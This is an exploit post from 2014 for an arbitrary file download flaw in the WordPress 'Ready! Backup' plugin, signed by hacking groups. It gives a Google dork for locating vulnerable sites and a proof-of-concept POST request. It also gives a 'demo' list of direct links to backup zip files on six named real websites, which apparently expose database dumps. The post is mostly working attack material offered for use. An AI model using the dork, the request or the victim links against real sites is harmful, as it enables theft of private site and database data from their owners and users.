facebook facebook twitter rss

WordPress Ready! Backup Arbitrary File Download Vulnerability

Author: Pro_Mast3r , Published: 09-10-2014
# Exploit Title: WordPress Ready! Backup Arbitrary File Download Vulnerability .


# Google Dork: inurl:/wp-content/upready/ .


# Date: 10-09-2014 .


# Author: Pro Mast3r .


# Author E-mail : Pro.Mast3r@hotmail.com


# Category: webapps


# platform: php


# Vendor: https://wordpress.org/plugins/ready-backup/ .

# p0c :
post url : http://127.0.0.1/wordpress/wp-admin/admin.php?page=ready-backup-and-restore
reqType=ajax&page=backup&action=writeTmpDbAction&tmp=/xampp/apps/wordpress/htdocs/wp-content/upready/.. data and name backup
zip - sql

http://[site]/wp-content/upready/

# demo :
https://www2.searchpoint.co.uk/wp-content/upready//backup_2014_08_22-17_06_52_id1.zip
http://www.hawk-hill.com/wp-content/upready/backup_2014_02_27-23_47_33_id1.zip
http://salon-einundzwanzig.de/wp-content/upready/backup_2014_05_26-17_25_57_id4.zip
http://comamosjuntos.es/wp-content/upready/backup_2014_09_06-09_17_38_id1.zip
http://mitius.co/wp-content/upready//backup_2014_07_24-14_11_33_id7.zip
http://almacalma.es/wp-content/upready//backup_2014_09_16-16_35_52_id1.zip
----
#exploit4arab
#IRAQ Cyber Army

Like us on Facebook :